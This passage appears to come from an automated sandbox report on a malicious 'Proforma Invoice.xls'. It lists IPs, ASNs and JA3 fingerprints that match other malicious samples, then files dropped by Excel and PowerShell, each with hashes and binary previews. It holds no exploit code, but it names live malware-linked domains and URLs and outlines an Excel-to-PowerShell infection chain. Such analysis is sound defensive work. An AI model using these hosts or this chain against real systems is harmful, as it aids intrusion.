                                                  SecuriteInfo.com.Exploit.Siggen2.64979.12090.xlsGet hashmaliciousBrowse
                                                  • 104.22.0.232
                                                  SecuriteInfo.com.Exploit.Siggen2.64979.3440.xlsGet hashmaliciousBrowse
                                                  • 172.67.8.238
                                                  SecuriteInfo.com.Exploit.Siggen2.64979.12090.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  SecuriteInfo.com.Exploit.Siggen2.64979.3440.xlsGet hashmaliciousBrowse
                                                  • 104.22.0.232
                                                  Invoice.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  Invoice.xlsGet hashmaliciousBrowse
                                                  • 104.22.0.232
                                                  Invoice.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  file.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  file.xlsGet hashmaliciousBrowse
                                                  • 172.67.8.238
                                                  file.xlsGet hashmaliciousBrowse
                                                  • 172.67.8.238
                                                  shopphongtinh.comProforma Invoice.xlsGet hashmaliciousBrowse
                                                  • 202.92.6.10
                                                  Proforma Invoice.xlsGet hashmaliciousBrowse
                                                  • 202.92.6.10
                                                  client.exeGet hashmaliciousBrowse
                                                  • 202.92.6.10
                                                  Invoice.xlsmGet hashmaliciousBrowse
                                                  • 202.92.6.10
                                                  SA Covid-19 Funding Connection.xlsmGet hashmaliciousBrowse
                                                  • 202.92.6.10
                                                  invoice.exeGet hashmaliciousBrowse
                                                  • 202.92.6.10

                                                  ASN

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  CLOUDFLARENETUSPayment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                  • 23.227.38.64
                                                  Proforma Invoice.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  Proforma Invoice.xlsGet hashmaliciousBrowse
                                                  • 104.22.0.232
                                                  https://www.canva.com/design/DAENqED8UzU/0m_RcAQIILTwa79MyPG8KA/view?utm_content=DAENqED8UzU&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                  • 104.18.215.67
                                                  1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                  • 104.20.138.65
                                                  https://akljsdhfas.selz.com/?Get hashmaliciousBrowse
                                                  • 104.18.108.36
                                                  quotation_0087210_pdf.exeGet hashmaliciousBrowse
                                                  • 172.67.188.154
                                                  Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                  • 104.24.105.107
                                                  1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                  • 162.159.134.233
                                                  INQUIRY.exeGet hashmaliciousBrowse
                                                  • 104.27.152.230
                                                  PO Quotation.jarGet hashmaliciousBrowse
                                                  • 104.20.22.46
                                                  doc2227740.xlsGet hashmaliciousBrowse
                                                  • 104.27.172.15
                                                  PO Quotation.jarGet hashmaliciousBrowse
                                                  • 104.20.23.46
                                                  doc2227740.xlsGet hashmaliciousBrowse
                                                  • 104.27.173.15
                                                  TRIAL-ORDER.exeGet hashmaliciousBrowse
                                                  • 104.18.57.249
                                                  d11311145.xlsGet hashmaliciousBrowse
                                                  • 104.27.173.15
                                                  23692 ANRITSU PROBE po 29288.exeGet hashmaliciousBrowse
                                                  • 104.23.99.190
                                                  d11311145.xlsGet hashmaliciousBrowse
                                                  • 104.27.173.15
                                                  PO #5618896.gz.exeGet hashmaliciousBrowse
                                                  • 104.23.98.190
                                                  PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                  • 162.159.134.233
                                                  VNPT-AS-VNVNPTCorpVNProforma Invoice.xlsGet hashmaliciousBrowse
                                                  • 202.92.6.10
                                                  Proforma Invoice.xlsGet hashmaliciousBrowse
                                                  • 202.92.6.10
                                                  qkN4OZWFG6.exeGet hashmaliciousBrowse
                                                  • 221.132.33.88
                                                  FMFF7xj5.exeGet hashmaliciousBrowse
                                                  • 103.207.39.131
                                                  rJz6SePuqu.dllGet hashmaliciousBrowse
                                                  • 123.19.40.157
                                                  Order inquiry.exeGet hashmaliciousBrowse
                                                  • 103.207.38.182
                                                  Nissin Eletach Vietnam Co., Ltd - PRODUCTS LIST.exeGet hashmaliciousBrowse
                                                  • 203.162.4.149
                                                  http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm/Get hashmaliciousBrowse
                                                  • 113.160.161.75
                                                  http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm/Get hashmaliciousBrowse
                                                  • 113.160.161.75
                                                  http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lmGet hashmaliciousBrowse
                                                  • 113.160.161.75
                                                  OK093822333448.docGet hashmaliciousBrowse
                                                  • 103.255.237.196
                                                  http://megalighthotel.com/c9tf/Scan/jg5zl1ho/a0k89721503873576lc1wkiavm472/Get hashmaliciousBrowse
                                                  • 113.160.250.165
                                                  DETAILS.jarGet hashmaliciousBrowse
                                                  • 103.207.39.83
                                                  Readmore Details.exeGet hashmaliciousBrowse
                                                  • 103.207.39.83
                                                  SecuriteInfo.com.Trojan.PackedNET.405.16508.exeGet hashmaliciousBrowse
                                                  • 103.207.39.83
                                                  detail-information.exeGet hashmaliciousBrowse
                                                  • 103.207.39.83
                                                  INFORMATIONS.doc.......exeGet hashmaliciousBrowse
                                                  • 103.207.39.83
                                                  executed.exeGet hashmaliciousBrowse
                                                  • 103.207.39.83
                                                  _000819.exeGet hashmaliciousBrowse
                                                  • 113.161.148.81
                                                  _000822.exeGet hashmaliciousBrowse
                                                  • 113.161.148.81

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  05af1f5ca1b87cc9cc9b25185115607dProforma Invoice.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  VQ01173428.docGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  SIN029088.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  SMBS PO 30 quotation.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsmGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsmGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsmGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsmGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  SecuriteInfo.com.Mal.Generic-S.18660.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.16832.xlsmGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  SecuriteInfo.com.Mal.Generic-S.27944.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.16832.xlsmGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  SecuriteInfo.com.Heur.5466.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  WayBill Invoice.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  WayBill Invoice.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  Untitled 20201030.docGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  request.2890.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  request613.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  UW_Medley Storage_20201030.xlsmGet hashmaliciousBrowse
                                                  • 104.22.1.232

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                  Category:dropped
                                                  Size (bytes):58936
                                                  Entropy (8bit):7.994797855729196
                                                  Encrypted:true
                                                  SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                  MD5:E4F1E21910443409E81E5B55DC8DE774
                                                  SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                  SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                  SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):326
                                                  Entropy (8bit):3.123186963792904
                                                  Encrypted:false
                                                  SSDEEP:6:kK9IwswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:vkPlE99SNxAhUegeT2
                                                  MD5:E733B1D7EC5FBD6CA27FAE46230B8523
                                                  SHA1:6A9AF125B0D6140760F33FFBDFCAA1DACB4AC727
                                                  SHA-256:47C093908539B2EA023EFE18587C6A71DD19C3DE1763D10892B4580B873F5074
                                                  SHA-512:25FE4AF99593EF664AD74D11899715544C8A00565054E73A26B07A8AEA8EFA648B35408597CB600CBB25C796D83096B8714010B27BFC05801E0E90C836D172B0
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: p...... ........V.x.....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                  C:\Users\user\AppData\Local\Temp\Cab2618.tmp
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                  Category:dropped
                                                  Size (bytes):58936
                                                  Entropy (8bit):7.994797855729196
                                                  Encrypted:true
                                                  SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                  MD5:E4F1E21910443409E81E5B55DC8DE774
                                                  SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                  SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                  SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                  C:\Users\user\AppData\Local\Temp\E3FE0000
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):57011
                                                  Entropy (8bit):7.861939790415782
                                                  Encrypted:false
                                                  SSDEEP:1536:/CyZD1jZKT4gHjmSb4wjE7zF0Rhdv1hQzMrTW:/5jjs0gVb4GE0DrTW
                                                  MD5:F4E0A1574520BEED64563164AC9C6F09
                                                  SHA1:70FC986FB84ED4DA58B544132996B1832C6E1BA4
                                                  SHA-256:306CB210EE5EB52162D117C45926E22F8880FBF4255FECF751753AEE5A954A6E
                                                  SHA-512:FB8B2F8ED81D22E233FFAC2DBB702FAAF1BF75BEB87368FFA23CD696293937956C2C03A6ED74D00F9A760FA2884FDF2E32B1CCEED83EE9C8A0FB9989A1FBF477
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: .TMo.1..W..X.Z.Mz...%.$=6......X...v........XPrYym...gf|...ZbL..]....I...7......R...x..[cb7../.u.T....9..B$...}@G'3.-d..s.@.`...h.]H.2.\...&.;........7..7g...^.j..._..A.T.=..`..L...)nS.g3-./....3.|.,.I.l.&.. 'd..Z..W....r.k.}.=.^&j..#...,.A..x.q1.~.O...q%..."fnAF..`j....ExD...A....ny}.nA.g..+.z.....a.....K%.S...#..o....T.(..9fO.......6....i.]...!..".?9R..z....P.^K.._|<.=.)]*...!.D.xy..z...@D...m..."u..{.e^*T..E7.'........PK..........!..._.............[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\Tar2619.tmp
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):152533
                                                  Entropy (8bit):6.31602258454967
                                                  Encrypted:false
                                                  SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                  MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                  SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                  SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                  SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu Nov 19 17:12:47 2020, atime=Thu Nov 19 17:12:47 2020, length=8192, window=hide
                                                  Category:dropped
                                                  Size (bytes):867
                                                  Entropy (8bit):4.472643117708891
                                                  Encrypted:false
                                                  SSDEEP:12:85Q12CLgXg/XAlCPCHaX2B8GB/1IX+WnicvbLKG+bDtZ3YilMMEpxRljKATdJP9O:85/U/XTm6G8YevLSDv3q5rNru/
                                                  MD5:AD259C9A8C9F26185EBDE7B41E54BBB9
                                                  SHA1:C643FC367524617E123B1B636707B374FB241EF2
                                                  SHA-256:C3B6011FEA9262DD1C376A32F7AF692D1EE93D16556E0EE31F59EB4C896AA1C3
                                                  SHA-512:52511CE096413F195383C86185FE4A4092A64EDBCFA517DC04A97F9E61CDCEA1FAB969C8D02FEBFA5C86BB196E9AE3327A745A593D6D287DE380D7542ED2DCC0
                                                  Malicious:false
                                                  Preview: L..................F...........7G................... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....sQ....Desktop.d......QK.XsQ..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......445817..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Proforma Invoice.LNK
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Thu Nov 19 17:12:47 2020, atime=Thu Nov 19 17:12:47 2020, length=78336, window=hide
                                                  Category:dropped
                                                  Size (bytes):2088
                                                  Entropy (8bit):4.5643277851765625
                                                  Encrypted:false
                                                  SSDEEP:48:87M/XTFGqMtk69Lt85Qh27M/XTFGqMtk69Lt85Q/:8Q/XJGq8/9585Qh2Q/XJGq8/9585Q/
                                                  MD5:41C1A8CF3064B63D878FBFE24DBA7217
                                                  SHA1:88A66CB5685F0F504AAEA5A03C50F9705FD145C0
                                                  SHA-256:F9E5559A17D66EEB13A67FD058244E83A991EBD15248237397D2E88A98432F2D
                                                  SHA-512:B6D9AAE6BDA000CC61DDF1FC310DB738EDDCDDDE46A1FC444EEF2E3FB0BD54AA33A2B69647BB754771B8DC2F9C90CC6B22B54C2ED7CFE019002F69C32D2D2EFB
                                                  Malicious:false
                                                  Preview: L..................F.... .....)..{........... .......2...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..*..sQ.. .PROFOR~1.XLS..V.......Q.y.Q.y*...8.....................P.r.o.f.o.r.m.a. .I.n.v.o.i.c.e...x.l.s.......~...............-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop\Proforma Invoice.xls.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.r.o.f.o.r.m.a. .I.n.v.o.i.c.e...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......445817..........D_....3N...W...9F.C....
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):101
                                                  Entropy (8bit):4.7170989234879075
                                                  Encrypted:false
                                                  SSDEEP:3:oyBVomMQDMILGMXd6ltaQILGMXd6lmMQDMILGMXd6lv:dj6GKg2afKgKGKgC
                                                  MD5:BC11129FCE6D9C1A695193CDCB97B257
                                                  SHA1:2EC83352C02CCC01E7513A894800E1219605F24B
                                                  SHA-256:31376558D616FB12266F87483A5097CA308C0EA58FCE25853A90FD33BCFE2140
                                                  SHA-512:03435DE22EEF6F71B2A327744ABD8B1A1FA8E4C04656A66DC9EBFBD7FE1C493EE857AED2B95AB4C1BB0A9A1D14FE2A6254C1F32453BBE3BC216E52E8EF7EBEC9
                                                  Malicious:false
                                                  Preview: Desktop.LNK=0..[xls]..Proforma Invoice.LNK=0..Proforma Invoice.LNK=0..[xls]..Proforma Invoice.LNK=0..
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BM2ZHU76DBVAIO05YU20.temp
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5925624900972752
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMq+qvsqvJCwofz8hQCsMq+qvsEHyqvJCworZz2YYbH8f8HXlUVNIu:cyDofz8yXHnorZz2kf8HGIu
                                                  MD5:623A126A88BC9A8082AC381E1CC11A6A
                                                  SHA1:C197DFA90570AA13F8771D9F0EF87BA50481A51D
                                                  SHA-256:E0D3D610D5A08BCC57FAD0B8659AFF2A091E05D13713C2527D28A9C74CBC1B3B
                                                  SHA-512:291C11C42D68792427A6EEB6D42AA6A3B00D665D6561E7107B3D55CD17075E082C2655B17F90B61F82233BC122D7C43072D8BEB5CE2186ECBDBEF76C9DAE02C1
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UAZUVM4XYCM7ZTE5LGRD.temp
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5925624900972752
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMq+qvsqvJCwofz8hQCsMq+qvsEHyqvJCworZz2YYbH8f8HXlUVNIu:cyDofz8yXHnorZz2kf8HGIu
                                                  MD5:623A126A88BC9A8082AC381E1CC11A6A
                                                  SHA1:C197DFA90570AA13F8771D9F0EF87BA50481A51D
                                                  SHA-256:E0D3D610D5A08BCC57FAD0B8659AFF2A091E05D13713C2527D28A9C74CBC1B3B
                                                  SHA-512:291C11C42D68792427A6EEB6D42AA6A3B00D665D6561E7107B3D55CD17075E082C2655B17F90B61F82233BC122D7C43072D8BEB5CE2186ECBDBEF76C9DAE02C1
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y3RTLD02WH835DFVTTFZ.temp
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5925624900972752
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMq+qvsqvJCwofz8hQCsMq+qvsEHyqvJCworZz2YYbH8f8HXlUVNIu:cyDofz8yXHnorZz2kf8HGIu
                                                  MD5:623A126A88BC9A8082AC381E1CC11A6A
                                                  SHA1:C197DFA90570AA13F8771D9F0EF87BA50481A51D
                                                  SHA-256:E0D3D610D5A08BCC57FAD0B8659AFF2A091E05D13713C2527D28A9C74CBC1B3B
                                                  SHA-512:291C11C42D68792427A6EEB6D42AA6A3B00D665D6561E7107B3D55CD17075E082C2655B17F90B61F82233BC122D7C43072D8BEB5CE2186ECBDBEF76C9DAE02C1
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                  Static File Info

                                                  General

